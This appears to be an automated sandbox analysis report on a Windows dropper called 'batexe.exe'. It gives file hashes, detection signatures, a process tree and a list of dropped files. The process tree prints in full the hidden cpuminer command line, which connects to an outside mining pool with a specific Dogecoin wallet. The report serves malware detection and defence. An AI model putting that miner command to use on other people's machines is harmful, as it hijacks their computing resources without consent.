73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
23/02/2024, 14:26

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3528	b2e.exe
5104	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4652-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4652 wrote to memory of 3528	4652	batexe.exe	74
PID 4652 wrote to memory of 3528	4652	batexe.exe	74
PID 4652 wrote to memory of 3528	4652	batexe.exe	74
PID 3528 wrote to memory of 928	3528	b2e.exe	75
PID 3528 wrote to memory of 928	3528	b2e.exe	75
PID 3528 wrote to memory of 928	3528	b2e.exe	75
PID 928 wrote to memory of 5104	928	cmd.exe	78
PID 928 wrote to memory of 5104	928	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4652
- C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D755.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:928
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe

Filesize
3.3MB

MD5
cff07f5378db93b387082c04f34b28c9

SHA1
96cd82a7cd780496561271fd587e899f8cd992e0

SHA256
44d9d19d459daed2236c8a5c03dab28f777d85a2f05826e412a69feb7fd88e51

SHA512
1fea021d58c8c554cec34cf12e914972328c00276c4a02670c852bbfc2ea60764835850860b2ff85196c5a26b4c1b572e39ebc5acc7d2fa4326505d6232c7f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\D438.tmp\b2e.exe

Filesize
3.9MB

MD5
5c583dc5b493091810f78dc75a4a9c48

SHA1
c73eb3c4cc889b0115bc535c71e284da7cbd3843

SHA256
ac112c4011173bd982112efd502e986051ac8c7331deb8cf0703dadd2cc1dc46

SHA512
53ab77ccbc94370a1d86d016889fa5ac45ec0f262ea35d00fdaa3e33f304f29057f57127fab25143ccf183383929382f024a411d5b5b8e9712a8e758f92a1414

Download Submit
C:\Users\Admin\AppData\Local\Temp\D755.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
409KB

MD5
362305054747d7584e8c9094eadd1adf

SHA1
27f06c44f44297516241fc86a6d3ed09eb3545d9

SHA256
b6361129ac446a49b712e678706c275b3b2514785cdadb19b8dd08716d37fe10

SHA512
b2ec4b56ff622376cbe98ea56e0b83539635356314497a46e780e75c0cf33f71a5615f25040c4cd385574d7874746fb0bce270a6f2ba89e6819ca5d99d6844f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
266KB

MD5
2d1166bc05d2f7f65383f6d48a9bf44e

SHA1
3841eb1ccda2de0e2b5871231a6e01146a24b7b4

SHA256
6e9d282b929f08e8f4065ca83ba4042871b65a7d787d33cf1679266d76615aec

SHA512
e491d0c645dea8cf05c72374b4abdb2fa57230a7234075a9aa2b131ce9341843d44be69e3d6705cb336a448eafba66e4618f7704eb0bcd1034c10cae97d1a875

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
440KB

MD5
5e83f0698186727f11407923bf21543d

SHA1
37320bd7bdcfcdefdeaa4d09a3f1286249aaa26d

SHA256
acf823cb8fd1e9d54dc833060c23e798abc8e3a0488d6efd7c79eb6d41de45df

SHA512
aceb8109fd6798b84d3012dd8b1e69f18adb1ea911fa74eeb051bbd021dba3c8eac48f51b96339d1627d2cd3804eafd4cc56d8ac33f68fc658b6be3230bb7460

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
377KB

MD5
14a0a2f96d8be789d0582a1ab97ea424

SHA1
6dc06246dfd087eb8ca54463e08176df403959c6

SHA256
eae6c777dc24380ac4219f0ef020e986a625a33271a5526690ecaada8a7029df

SHA512
4f5a6bdf4d21e75d7a3a47006a10d10afb0d52132ff577af87dfc762846e13bf48597938f76c491bc44b108bda820e21bfae08ab3cd130acc22b526ac7e7dd85

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
459KB

MD5
f9b8b0ae18334acbe6db08f6679bd620

SHA1
911c55def7f2bf902754cc98c34ae96a644e7832

SHA256
36ffafae5b796f2947595ff64ac0411517b90facd03d070dc4729128cb96a557

SHA512
456b79a710679318a1077a6e7905af5fb1d4f2e1c419836c8395d9c5b9a8b6945c5d4b05836df2b47ec294aa37a4a665a44268146dbb37fe301b9551a63fc727

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
64KB

MD5
6cccf65bd7d7ff5b53aeb882e15c462c

SHA1
a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d

SHA256
1379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2

SHA512
c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
317KB

MD5
4ead5175a14150b7f514d787f1ec2e0d

SHA1
205496f65a5567c5e3a3ffe0060d5ec229e5f4ea

SHA256
74b25e1bd125c5bcc4bc96f50491058c3e720f4fc98e509c4bdca78b0793149d

SHA512
b7fe3950297e0f477f2eeeb3856cd691e4081499f9b74030c33759072b287f53fe1a21f13b8c93787ca62494d4aac028a872025ba6defae1db6611222909cef7

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
221KB

MD5
6f4a319d12e48016a715add4a19b7310

SHA1
e641eec6e0c3ca3bb89f0a0ba4eb63d33392b32a

SHA256
2e45ae2b353cb058073ae37f1a3031be62da0cff0ffcee196d6bbd64fab30bc0

SHA512
36b64f80f7e61b39fbc8112a5e2cd565839cf3794b291986f5780b55b2c699994e8cedacc32f60a6e7448eea8d67a3c764c6bf8279561ad749e931e3826d5bc2

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
139KB

MD5
b2791294b8263e27d294b55ed1273304

SHA1
47c54f1cf6933cca55a986b35add15bb9aa9208b

SHA256
ee5a0bae31f9e961494b176c478278e9fe9f8a770ccf2c404fbf5fa5664589cf

SHA512
10cd90b1c7798c60172cb522ddec38a1a5e096d61d51ef41d93cefa7534cc57f05a022bbce75a39afbfeb3fa7365ffd656aa759c4907afd33ba4fadc25564904

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
200KB

MD5
98ef6dd533969ffc7c74a0389a4975b6

SHA1
8631b51afd697d5c882aad20fd52fc92b89d38c0

SHA256
6a7d61cabcc2f4417296f41745ea0cefe257934569a3b22a34270aa518c8ad72

SHA512
0b727ab281e4120a1cde1efb7f20f7a80e4f035763be652ca951b64b35396814fcdf067cfe68c31e09c6b95210126384a860a38831c90d82f9dd6025dccba1fb

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
358KB

MD5
b91377b6f6ec18fb210f10e4dc574130

SHA1
877dbdb93ce8684a7736ab7b0198643fe4a47ebb

SHA256
1ec2574c5636cf204ebb7eb51becf07cb97505298e9132cd699c3c5fd2da3091

SHA512
80bb96bb806a84c81e94e2944d1e286c3c29dbfc89365a5a1ae7e492646ae4417f233bcf35c3b0749ef7a9c788c4a3aab37025aba6593006dd491290c8b39aaf

Download Submit
memory/3528-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3528-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4652-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5104-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5104-43-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/5104-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5104-44-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/5104-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download